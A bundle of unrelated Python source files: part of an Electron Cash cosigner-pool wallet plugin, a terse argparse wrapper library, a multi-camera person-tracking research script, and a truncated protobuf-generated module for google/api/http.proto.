# overrides DaemonThread -- clears queue on (re)start
if not self.is_running():
self.timeoutQ = queue.Queue() # clear queue in case it had stale data.
super().start()
def stop_join(self):
self.stop()
try: self.join()
except RuntimeError: pass # was never started
class State(QObject):
''' Window-specific state. Gets inserted into cosigner_pool_state attribute
for window. '''
cosigner_receive_signal = pyqtSignal(object, object)
listener = None
keys = []
cosigner_list = []
plugin_ref = None # Weak.ref to plugin object
window_ref = None # Weak.ref to window object
server = None
def __init__(self, plugin, window):
super().__init__() # top-level QObject, no parent()
self.server = TimeoutServerProxy('http://%s:%d'%(HOST,PORT), allow_none=True, timeout = 2.0)
self.listener = Listener(self)
self.plugin_ref = Weak.ref(plugin)
self.window_ref = Weak.ref(window)
self.cosigner_receive_signal.connect(self.on_receive)
def on_receive(self, k, m):
plugin = self.plugin_ref()
window = self.window_ref()
if plugin and window:
plugin.on_receive(window, k, m)
class _Dead:
pass
class Plugin(BasePlugin):
Instance_ref = Weak.ref(_Dead()) # Make sure Instance_ref is always defined, defaults to dead object
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.windows = []
self.initted = False
@hook
def init_qt(self, gui):
if self.initted: return # already initted
self.print_error("Initializing...")
for window in gui.windows:
self.on_new_window(window)
Plugin.Instance_ref = Weak.ref(self)
self.initted = True
@hook
def on_new_window(self, window):
try: wallet = window.wallet
except AttributeError:
# this can happen if wallet is not started up properly
self.print_error("WARNING: Window {} lacks a wallet -- startup race condition likely. FIXME!".format(window.diagnostic_name()))
return
if isinstance(wallet, Multisig_Wallet):
window.cosigner_pool_state = state = State(self, window)
self.windows.append(window)
self.update(window)
# un-gray-out buttons for tx dialogs left around related to this window
for b in Plugin.get_all_cosigner_buttons():
if b.wallet_ref() == wallet:
b.setEnabled(True)
@hook
def on_close_window(self, window):
if window in self.windows:
state = getattr(window, 'cosigner_pool_state', None)
if state:
if state.listener:
self.print_error("shutting down listener for",window.diagnostic_name())
state.listener.stop_join()
state.deleteLater()
delattr(window, 'cosigner_pool_state')
self.print_error("unregistered for window",window.diagnostic_name())
self.windows.remove(window)
# gray out buttons for tx dialogs left around related to this window
for b in Plugin.get_all_cosigner_buttons():
if b.wallet_ref() == window.wallet:
b.setEnabled(False)
@staticmethod
def get_all_cosigner_buttons():
ret = []
app = QApplication.instance()
for w in app.topLevelWidgets():
if isinstance(w, TxDialog):
but = getattr(w, 'cosigner_send_button', None)
if but: ret.append(but)
return ret
def is_available(self):
return True
def on_close(self):
for w in self.windows.copy():
self.on_close_window(w)
self.windows = []
self.initted = False
super().on_close()
def update(self, window):
wallet = window.wallet
state = window.cosigner_pool_state
if not state:
self.print_error("No cosigner pool state object for window", window.diagnostic_name())
return
listener = state.listener
state.keys = []
state.cosigner_list = []
for key, keystore in wallet.keystores.items():
xpub = keystore.get_master_public_key()
K = bitcoin.deserialize_xpub(xpub)[-1]
_hash = bh2u(bitcoin.Hash(K))
if not keystore.is_watching_only():
state.keys.append((key, _hash))
else:
state.cosigner_list.append((xpub, K, _hash))
listener.set_keyhashes([t[1] for t in state.keys])
if not listener.is_running():
self.print_error("Starting listener for", window.diagnostic_name())
listener.start()
@hook
def transaction_dialog(self, d):
window, state = self._find_window_and_state_for_wallet(d.wallet)
if window and state:
d.cosigner_send_button = b = QPushButton(_("Send to cosigner"))
b.wallet_ref = Weak.ref(window.wallet)
b.clicked.connect(lambda: Plugin.do_send_static(d))
d.buttons.insert(0, b)
self.transaction_dialog_update(d)
@hook
def transaction_dialog_update(self, d):
window, state = self._find_window_and_state_for_wallet(d.wallet)
but = getattr(d, 'cosigner_send_button', None)
if not but or not window or not state or d.tx.is_complete() or d.wallet.can_sign(d.tx):
but and but.hide()
return
for xpub, K, _hash in state.cosigner_list:
if self.cosigner_can_sign(d.tx, xpub):
but and but.show()
break
else:
but and but.hide()
def _find_window_and_state_for_wallet(self, wallet):
for window in self.windows:
if window.wallet == wallet:
return window, window.cosigner_pool_state
return None, None
def cosigner_can_sign(self, tx, cosigner_xpub):
from electroncash.keystore import is_xpubkey, parse_xpubkey
xpub_set = set([])
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
xpub_set.add(xpub)
return cosigner_xpub in xpub_set
@staticmethod
def do_send_static(d):
''' Decouples button slot from running instance in case user stops/restarts the plugin while TxDialogs are up. '''
plugin = Plugin.Instance_ref()
if plugin:
plugin.do_send(d)
else:
print_error("[cosigner_pool] No plugin.")
def do_send(self, d):
tx = d.tx
window, state = self._find_window_and_state_for_wallet(d.wallet)
if not tx or not window or not state:
self.print_error("Missing tx or window or state")
return
for xpub, K, _hash in state.cosigner_list:
if not self.cosigner_can_sign(tx, xpub):
continue
message = bitcoin.encrypt_message(bfh(tx.raw), bh2u(K)).decode('ascii')
try:
state.server.put(_hash, message)
except Exception as e:
traceback.print_exc(file=sys.stdout)
window.show_error(_("Failed to send transaction to cosigning pool."))
return
d.show_message(_("Your transaction was sent to the cosigning pool.") + '\n' +
_("Open your cosigner wallet to retrieve it."))
def on_receive(self, window, keyhash, message):
self.print_error("signal arrived for", keyhash, "@", window.diagnostic_name())
state = getattr(window, 'cosigner_pool_state', None)
if not state:
self.print_error("Error: state object not found")
return
keys = state.keys
for key, _hash in keys:
if _hash == keyhash:
break
else:
self.print_error("keyhash not found")
return
wallet = window.wallet
if isinstance(wallet.keystore, keystore.Hardware_KeyStore):
window.show_warning(_('An encrypted transaction was retrieved from cosigning pool.') + '\n' +
_('However, hardware wallets do not support message decryption, '
'which makes them not compatible with the current design of cosigner pool.'))
return
password = None
if wallet.has_password():
password = window.password_dialog(_('An encrypted transaction was retrieved from cosigning pool.') + '\n' +
_('Please enter your password to decrypt it.'))
if not password:
return
else:
details = (_("If you choose 'Yes', it will be decrypted and a transaction window will be shown, giving you the opportunity to sign the transaction.")
+ "\n\n" + _("If you choose 'No', you will be asked again later (the next time this wallet window is opened)."))
ret = window.msg_box(icon = QMessageBox.Question, parent = None, title=_("Cosigner Pool"), buttons=QMessageBox.Yes|QMessageBox.No,
text = _("An encrypted transaction was retrieved from cosigning pool.") + '\n' + _("Do you want to open it now?"),
detail_text = details)
if ret != QMessageBox.Yes:
return
err, badpass = "Unknown Error", False
try:
xprv = wallet.keystore.get_master_private_key(password)
except InvalidPassword as e:
err, badpass = str(e), True
xprv = None
if not xprv:
window.show_error(err)
if badpass:
self.on_receive(window, keyhash, message) # try again
return
try:
k = bh2u(bitcoin.deserialize_xprv(xprv)[-1])
EC = bitcoin.EC_KEY(bfh(k))
message = bh2u(EC.decrypt_message(message))
except Exception as e:
traceback.print_exc(file=sys.stdout)
window.show_error(repr(e))
return
state.listener.clear(keyhash)
tx = transaction.Transaction(message)
show_transaction(tx, window, prompt_if_unsaved=True)
|
|
"""Terse command-line parser wrapper around ArgumentParser
Example Usage:
# First example is the equivalent version of an example from the
# argparse docs
p = Parser(
'cmd', 'Process some integers',
Arg('integers', 'an integer for the accumulator',
metavar='N', type=int, nargs='+'),
Arg('--sum', 'sum the integers (default: find the max)',
dest='accumulate', action='store_const',
const=sum, default=max))
args = p.parse_args('1 2 3 4'.split())
Changes from argparse are as follows:
* All arguments and parsers require documentation strings
* A composable syntax for constructing parsers
* Some default types are provided with user friendly error messages
* Metavars are created automatically and provide type information
* SubParser names and descriptions are displayed in help
* SubParsers support common arguments. Arguments in SubParsers are added
to all parsers within the SubParsers instance.
* Debugging information can be enabled with '--terseparse-debug' as first argument
"""
from argparse import SUPPRESS
import six
import sys
import warnings
from terseparse.root_parser import RootParser
class KW(object):
"""Holds keyword arguments for Parser objects.
Due to the composable style for building parsers and the requirement of
language that positional arguments are not allowed after keyword arguments,
this class is used to pass keyword arguments to parsers.
>>> parser = Parser('name', 'description', KW(epilog='epilog'))
"""
def __init__(self, **kwargs):
self.kwargs = kwargs
def __call__(self, parser):
return parser
class AbstractParser(object):
"""ABC for Parser objects.
Parser objects can hold Arg and SubParsers.
Do not update any instance local state outside of init.
"""
def __init__(self, name, description, *args):
self._name = name
self._description = description
self._args = []
self._kwargs = {}
for arg in args:
if isinstance(arg, KW):
self._kwargs.update(arg.kwargs)
else:
self._args.append(arg)
self._kwargs['description'] = description
self.epilog = self._kwargs.pop('epilog', '')
self._init()
def _init(self):
"""Subclass init method"""
pass
def __call__(self, parser, **kwargs):
return self._build(parser, self._updated_kwargs(kwargs))
def _updated_kwargs(self, kwargs):
return dict(list(self._kwargs.items()) + list(kwargs.items()))
def _build(self, **kwargs):
raise NotImplemented()
@property
def name(self):
return self._name
@property
def description(self):
return self._description
@property
def args(self):
return iter(self._args)
class Parser(AbstractParser):
def _init(self):
self._subparser = None
for arg in self.args:
if isinstance(arg, SubParsers):
assert self._subparser is None, (
'Only one SubParsers can be added '
'(argparse only allows one subparser)')
self._subparser = arg
def _build(self, parser, kwargs):
p = parser.add_parser(self.name, **kwargs)
for arg in self.args:
arg(p)
return p
@property
def subparser(self):
return self._subparser
def subparsers_summary(self, spacing=2):
if not self.subparser or not self.subparser.parsers:
return ''
parsers = self.subparser.parsers
name_width = max(len(p.name) for p in parsers) + spacing
args = ' '.join('{}'.format(a.name) for a in self.subparser.args)
msg = ''
spacer = ' ' * spacing
if parsers:
msg = 'commands: {}\n'.format(self.subparser.description)
msg += spacer + 'usage: {} {{{}}} {} ...\n\n'.format(
self.name, self.subparser.name, args)
for p in parsers:
msg += '{}{:{}} {}\n'.format(
spacer,
p.name, name_width,
p.description)
return msg
def parse_args(self, args=None, namespace=None, defaults=None):
"""Parse args, returns a tuple of a parser and ParsedArgs object
Args:
args -- sequence of strings representing the arguments to parse
namespace -- object to use for holding arguments
defaults -- lazily loaded dict like object of default arguments
Returns: (parser, ParsedArgs)
parser supports a .error message for displaying an error and exiting with usage
If a default key is callable then it is called with the current namespace,
and then returned.
"""
epilog = self.subparsers_summary()
epilog += self.epilog
return self(RootParser, epilog=epilog).parse_args(args, namespace, defaults)
class SubParsers(AbstractParser):
"""SubParsers are used for holding other Parsers.
They are the building block of sub-commands.
"""
def _init(self):
self._parsers = []
args = []
for arg in self.args:
if isinstance(arg, Arg):
args.append(arg)
elif isinstance(arg, Parser):
self._parsers.append(arg)
else:
assert False, 'Unknown builder type {!r}'.format(type(arg))
self._args = args
for parser in self.parsers:
parser._args = self._args + parser._args
def _build(self, parser, kwargs):
# python 2-3 compatible change
# see https://stackoverflow.com/a/22994500/9899650
if "dest" not in kwargs:
kwargs["dest"] = self._name
sp = parser.add_subparsers(title=self.name, **kwargs)
# python 2-3 compatible change
# see https://stackoverflow.com/a/23354355/9899650
if "required" not in kwargs:
sp.required = True
for parser in self.parsers:
parser(sp)
return sp
@property
def parsers(self):
return list(self._parsers)
class Group(object):
def __init__(self, title, description, *args):
self.title = title
self.description = description
self.args = []
self._kwargs = {}
for arg in args:
if isinstance(arg, KW):
self._kwargs.update(arg.kwargs)
else:
self.args.append(arg)
def __call__(self, parser):
grp = parser.add_argument_group(self.title, self.description)
for arg in self.args:
arg(grp, **self._kwargs)
return grp
class Arg(object):
"""Arg wraps parser.add_arguments
This class will pass all kwargs to the add_arguments call
"""
def __init__(self, name, help=None, type=None, default=None, hidden=False,
**kwargs):
self.name = name
self.help = help
self.type = type
self.default = default
self.hidden = hidden
self.kwargs = kwargs
def __call__(self, parser, **_kwargs):
kwargs = self.kwargs.copy()
if self.type:
kwargs['type'] = self.type
if self.help:
if self.type:
type_str = '<{}>'.format(str(self.type))
kwargs['help'] = type_str + ' ' + self.help
else:
kwargs['help'] = self.help
for k, v in _kwargs.items():
kwargs[k] = v
if self.hidden:
kwargs['help'] = SUPPRESS
kwargs['default'] = self.default
if isinstance(self.name, six.string_types):
names = [self.name]
else:
names = self.name
action = parser.add_argument(*names, **kwargs)
if action.nargs != 0:
if self.type:
type_str = '<{}>'.format(str(self.type))
if action.option_strings != []:
action.metavar = type_str
else:
action.metavar = action.dest
action.dest = action.dest.replace('-', '_')
return parser
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-.
from __future__ import print_function
from __future__ import division
import argparse
from os.path import join as pjoin
from os import makedirs
import time, datetime
# the usual suspects
import h5py
import numpy as np
import matplotlib as mpl
mpl.use('Agg')
#mpl.use('GTK')
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from mpl_toolkits.axes_grid1 import ImageGrid
#tracker stuff
import lib
from track import Track
from fakenews import FakeNeuralNewsNetwork
from semifake import SemiFakeNews
#from neural import RealNews
SEQ_FPS = 60.0
SEQ_DT = 1./SEQ_FPS
SEQ_SHAPE = (1080, 1920)
STATE_SHAPE = (135, 240) # Heatmaps: (26, 58) -> (33, 60)
STATE_PADDING = ((5,5), (10,10)) # state shape is this much larger on the sides, see np.pad.
g_frames = 0 # Global counter for correct FPS in all cases
try:
profile
except NameError:
def profile(f):
return f
def n_active_tracks(tracklist):
return '{:2d} +{:2d} +{:2d} ={:2d}'.format(
sum(t.status == 'matched' for t in tracklist),
sum(t.status == 'missed' for t in tracklist),
sum(t.status == 'init' for t in tracklist),
len(tracklist),
)
# from collections import Counter
#return str(Counter(t.status for t in tracklist).most_common())
def shall_vis(args, curr_frame):
return args.vis and (curr_frame - args.t0) % args.vis == 0
@lib.lru_cache(maxsize=16) # In theory 1 is enough here, but whatever =)
def get_image(basedir, icam, frame):
#framedir = 'frames-0.5' if SCALE_FACTOR == 0.5 else 'frames'
# TODO: Use basedir again, from args.
return plt.imread(pjoin('/work3/beyer/', 'frames-0.5', 'camera{}/{}.jpg'.format(icam, lib.glob2loc(frame, icam))))
@profile
def main(net, args):
eval_path = pjoin(args.outdir, 'results/run_{:%Y-%m-%d_%H:%M:%S}.txt'.format(datetime.datetime.now()))
debug_dir = None
if args.debug:
debug_dir = pjoin(args.outdir, 'debug/run_{:%Y-%m-%d_%H:%M:%S}'.format(datetime.datetime.now()))
makedirs(pjoin(debug_dir, 'crops'), exist_ok=True)
track_lists = [[] for _ in args.cams]
track_id = 1
# Open embedding cache
if args.embcache is not None:
embs_caches = [h5py.File(args.embcache.format(icam), 'r')['embs'] for icam in args.cams]
else:
embs_caches = [None]*len(args.cams)
# ===Tracking fun begins: iterate over frames===
# TODO: global time (duke)
for curr_frame in range(args.t0, args.t1+1):
print("\rFrame {}, {} matched/missed/init/total tracks, {} total seen".format(curr_frame, ', '.join(map(n_active_tracks, track_lists)), sum(map(len, track_lists))), end='', flush=True)
net.tick(curr_frame)
for icam, track_list, embs_cache in zip(args.cams, track_lists, embs_caches):
net.fake_camera(icam)
image_getter = lambda: get_image(args.basedir, icam, curr_frame)
# Either embed the image, or load embedding from cache.
if embs_cache is not None:
image_embedding = np.array(embs_cache[curr_frame-127720]) # That's where the cache starts!
else:
image_embedding = net.embed_images([image_getter()])[0]
# ===visualization===
# First, plot what data we have before doing anything.
if shall_vis(args, curr_frame):
#fig, axes = plt.subplots(3, 2, sharex=True, sharey=True, figsize=(20,12))
#(ax_tl, ax_tr), (ax_ml, ax_mr), (ax_bl, ax_br) = axes
fig, axes = plt.subplots(2, 2, sharex=True, sharey=True, figsize=(20,12))
(ax_ml, ax_mr), (ax_bl, ax_br) = axes
axes = axes.flatten()
for ax in axes:
ax.imshow(image_getter(), extent=[0, SEQ_SHAPE[1], SEQ_SHAPE[0], 0])
# plot (active) tracks
#ax_tl.set_title('Raw Personness')
#ax_tr.set_title('Filtered Personness')
ax_ml.set_title('Prior')
ax_mr.set_title('All ID-specific')
ax_bl.set_title('Posterior')
ax_br.set_title('All Tracks')
# ===/visualization===
### A) update existing tracks
for itracker, track in enumerate(track_list):
# ---PREDICT---
track.track_predict()
if shall_vis(args, curr_frame):
track.plot_pred_heatmap(ax_ml)
# ---SEARCH---
id_distmap = net.search_person(image_embedding, track.embedding, T=1,
fake_track_id=track.track_id) # Unused by real net.
# FIXME: should be image.shape, or at least use scale-factor.
id_distmap = net.fix_shape(id_distmap, (1080//2, 1920//2), STATE_SHAPE, fill_value=1/np.prod(STATE_SHAPE))
id_heatmap = lib.softmin(id_distmap, T=1)
#id_heatmap /= np.sum(id_heatmap)
# ---UPDATE---
track.track_update(id_heatmap, id_distmap, curr_frame, image_getter)
if shall_vis(args, curr_frame):
track.plot_id_heatmap(ax_mr)
### B) get new tracks from general heatmap
viz_per_cam_personnesses = []
#known_embs = [track.embedding for track in track_lists[icam-1]]
#personness = net.clear_known(image_personnesses[icam-1], image_embeddings[icam-1], known_embs=known_embs)
#personness = net.fix_shape(personness, images[icam-1].shape, STATE_SHAPE, fill_value=0)
#viz_per_cam_personnesses.append(personness)
# B.1) COMMENT IN FOR SEMI-FAKE
# TODO: Make semi-fake by generating heatmap and clearing out known_embs
# TODO: use image instead of None for real one here
for (new_heatmap, init_pose), new_id in net.personness(None, known_embs=None, return_pose=True):
# TODO: get correct track_id (loop heatmap, instead of function call?# )
# TODO: get id_heatmap of that guy for init_heatmap
# Don't fix shape yet, cuz we don't emulate the avg-pool shape screw-up.
#new_heatmap = net.fix_shape(new_heatmap, images[icam-1].shape, STATE_SHAPE, fill_value=0)
#init_pose = lib.argmax2d_xy(new_heatmap)
new_track = Track(net.embed_crops,
curr_frame, init_pose, image_getter(), track_id=new_id,
state_shape=STATE_SHAPE, state_pad=STATE_PADDING, output_shape=SEQ_SHAPE,
dist_thresh=args.dist_thresh, entropy_thresh=args.ent_thresh,
unmiss_thresh=args.unmiss_thresh, delete_thresh=args.delete_thresh,
maxlife=args.maxlife, tp_hack=args.tp_hack,
debug_out_dir=debug_dir)
new_track.init_heatmap(new_heatmap)
#new_track.init_heatmap(np.full(STATE_SHAPE, 1/np.prod(STATE_SHAPE)))
track_list.append(new_track)
# B.2) REAL NEWS
# TODO: Missing non-max suppression
# for y_idx, x_idx in zip(*np.where(personness>1.5)):
# init_pose = [y_idx, x_idx]
# new_track = Track(net.embed_crop, SEQ_DT,
# curr_frame, init_pose, images[icam-1], track_id=track_id,
# state_shape=STATE_SHAPE, output_shape=SEQ_SHAPE,
# debug_out_dir=debug_dir)
# # Embed around the initial pose and compute an initial heatmap.
# id_heatmap = net.search_person(image_embeddings[icam-1], new_track.embedding)
# id_heatmap = net.fix_shape(id_heatmap, images[icam-1].shape, STATE_SHAPE, fill_value=0)
# new_track.init_heatmap(id_heatmap)
# track_id += 1
# track_list.append(new_track)
if shall_vis(args, curr_frame):
for track in track_list:
track.plot_pos_heatmap(ax_bl)
track.plot_track(ax_br, plot_past_trajectory=True, time_scale=args.vis)
for ax in axes:
# TODO: Flex
ax.set_adjustable('box-forced')
ax.set_xlim(0, SEQ_SHAPE[1])
ax.set_ylim(SEQ_SHAPE[0], 0)
fig.savefig(pjoin(args.outdir, 'camera{}/res_img_{:06d}.jpg'.format(icam, curr_frame)),
quality=80, bbox_inches='tight', pad_inches=0.2)
plt.close()
### C) further track-management
# delete tracks marked as 'deleted' in this tracking cycle #TODO: manage in other list for re-id
track_list[:] = [i for i in track_list if i.status != 'deleted']
# ==evaluation===
with open(eval_path, 'a') as eval_file:
for icam, track_list in zip(args.cams, track_lists):
for track in track_list:
track_eval_line = track.get_track_eval_line(cid=icam, frame=curr_frame)
eval_file.write('{} {} {} {} {} {} {} {} {}\n'.format(*track_eval_line))
global g_frames
g_frames += 1
# Heavily adapted and fixed from http://robotics.usc.edu/~ampereir/wordpress/?p=626
def savefig(fname, fig=None, orig_size=None, **kw):
if fig is None:
fig = plt.gcf()
fig.patch.set_alpha(0)
w, h = fig.get_size_inches()
if orig_size is not None: # Aspect ratio scaling if required
fw, fh = w, h
w, h = orig_size
fig.set_size_inches((fw, (fw/w)*h))
fig.set_dpi((fw/w)*fig.get_dpi())
ax = fig.gca()
ax.set_frame_on(False)
ax.set_xticks([]); ax.set_yticks([])
ax.set_axis_off()
#ax.set_xlim(0, w); ax.set_ylim(h, 0)
fig.savefig(fname, transparent=True, bbox_inches='tight', pad_inches=0, **kw)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='2D tracker test.')
parser.add_argument('--basedir', nargs='?', default='/work/breuers/dukeMTMC/',
help='Path to `train` folder of 2DMOT2015.')
parser.add_argument('--outdir', nargs='?', default='/home/breuers/results/duke_mtmc/',
help='Where to store generated output. Only needed if `--vis` is also passed.')
parser.add_argument('--model', default='lunet2c',
help='Name of the model to load. Corresponds to module names in lib/models. Or `fake`')
parser.add_argument('--weights', default='/work/breuers/dukeMTMC/models/lunet2c-noscale-nobg-2to32-aug.pkl',
help='Name of the weights to load for the model (path to .pkl file).')
parser.add_argument('--t0', default=127720, type=int,
help='Time of first frame.')
parser.add_argument('--t1', default=187540, type=int,
help='Time of last frame, inclusive.')
parser.add_argument('--large_gpu', action='store_true',
help='Large GPU can forward more at once.')
parser.add_argument('--vis', default=0, type=int,
help='Generate and save visualization of the results, every X frame.')
parser.add_argument('--debug', action='store_true',
help='Generate extra many debugging outputs (in outdir).')
parser.add_argument('--cams', default='1,2,3,4,5,6,7,8',
help='Array of cameras numbers (1-8) to consider.')
parser.add_argument('--embcache',
help='Optional path to embeddings-cache file for speeding things up. Put a `{}` as placeholder for camera-number.')
parser.add_argument('--dist_thresh', default=7, type=float,
help='Distance threshold to evaluate measurment certainty.')
parser.add_argument('--ent_thresh', default=0.1, type=float,
help='Entropy threshold to evaluate measurment certainty.')
parser.add_argument('--maxlife', type=int)
parser.add_argument('--tp_hack', type=float)
parser.add_argument('--unmiss_thresh', type=int, default=2)
parser.add_argument('--delete_thresh', type=int, default=90)
args = parser.parse_args()
args.cams = eval('[' + args.cams + ']')
print(args)
# This is all for faking the network.
if args.model == 'fake':
net = FakeNeuralNewsNetwork(lib.load_trainval(pjoin(args.basedir, 'ground_truth', 'trainval.mat'), time_range=[args.t0, args.t1]))
else:
#net = RealNews(
net = SemiFakeNews(
model=args.model,
weights=args.weights,
input_scale_factor=1.0,
fake_dets=lib.load_trainval(pjoin(args.basedir, 'ground_truth', 'trainval.mat'), time_range=[args.t0, args.t1]),
fake_shape=STATE_SHAPE,
)
# Prepare output dirs
for icam in args.cams:
makedirs(pjoin(args.outdir, 'camera{}'.format(icam)), exist_ok=True)
makedirs(pjoin(args.outdir, 'results'), exist_ok=True)
tstart = time.time()
try:
main(net, args)
except KeyboardInterrupt:
print()
print('FPS: {:.3f}'.format(g_frames / (time.time() - tstart)))
|
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/api/http.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/api/http.proto',
package='google.api',
syntax='proto3',
serialized_options=_b('\n\016com.google.apiB\tHttpProtoP\001ZAgoogle.golang.org/genproto/googleapis/api/annotations;annotations\370\001\001\242\002\004GAPI'),
serialized_pb=_b('\n\x15google/api/http.proto\x12\ngoogle.api\"T\n\x04Http\x12#\n\x05rules\x18\x01 \x03(\x0b\x32\x14.google.api.HttpRule\x12\'\n\x1f\x66ully_decode_reserved_expansion\x18\x02 \x01(\x08\"\x81\x02\n\x08HttpRule\x12\x10\n\x08selector\x18\x01 \x01(\t\x12\r\n\x03get\x18\x02 \x01(\tH\x00\x12\r\n\x03put\x18\x03 \x01(\tH\x00\x12\x0e\n\x04post\x18\x04 \x01(\tH\x00\x12\x10\n\x06\x64\x65lete\x18\x05 \x01(\tH\x00\x12\x0f\n\x05patch\x18\x06 \x01(\tH\x00\x12/\n\x06\x63ustom\x18\x08 \x01(\x0b\x32\x1d.google.api.CustomHttpPatternH\x00\x12\x0c\n\x04\x62ody\x18\x07 \x01(\t\x12\x15\n\rresponse_body\x18\x0c \x01(\t\x12\x31\n\x13\x61\x64\x64itional_bindings\x18\x0b \x03(\x0b\x32\x14.google.api.HttpRuleB\t\n\x07pattern\"/\n\x11\x43ustomHttpPattern\x12\x0c\n\x04kind\x18\x01 \x01(\t\x12\x0c\n\x04path\x18\x02 \x01(\tBj\n\x0e\x63om.google.apiB\tHttpProtoP\x01ZAgoogle.golang.org/genproto/googleapis/api/annotations;annotations\xf8\x01\x01\xa2\x02\x04GAPIb\x06proto3')
)
_HTTP = _descriptor.Descriptor(
name='Http',
full_name='google.api.Http',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='rules', full_name='google.api.Http.rules', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='fully_decode_reserved_expansion', full_name='google.api.Http.fully_decode_reserved_expansion', index=1,
number=2, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=37,
serialized_end=121,
)
_HTTPRULE = _descriptor.Descriptor(
name='HttpRule',
full_name='google.api.HttpRule',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='selector', full_name='google.api.HttpRule.selector', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='get', full_name='google.api.HttpRule.get', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='put', full_name='google.api.HttpRule.put', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='post', full_name='google.api.HttpRule.post', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='delete', full_name='google.api.HttpRule.delete', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='patch', full_name='google.api.HttpRule.patch', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom', full_name='google.api.HttpRule.custom', index=6,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='body', full_name='google.api.HttpRule.body', index=7,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='response_body', full_name='google.api.HttpRule.response_body', index=8,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='additional_bindings', full_name='google.api.HttpRule.additional_bindings', index=9,
number=11, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='pattern', full_name='google.api.HttpRule.pattern',
index=0, containing_type=None, fields=[]),
],
serialized_start=124,
serialized_end=381,
)
_CUSTOMHTTPPATTERN = _descriptor.Descriptor(
name='CustomHttpPattern',
full_name='google.api.CustomHttpPattern',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='kind', full_name='google.api.CustomHttpPattern.kind', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='path', full_name='google.api.CustomHttpPattern.path', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=383,
serialized_end=430,
)
_HTTP.fields_by_name['rules'].message_type = _HTTPRULE
_HTTPRULE.fields_by_name['custom'].message_type = _CUSTOMHTTPPATTERN
_HTTPRULE.fields_by_name['additional_bindings'].message_type = _HTTPRULE
_HTTPRULE.oneofs_by_name['pattern'].fields.append(
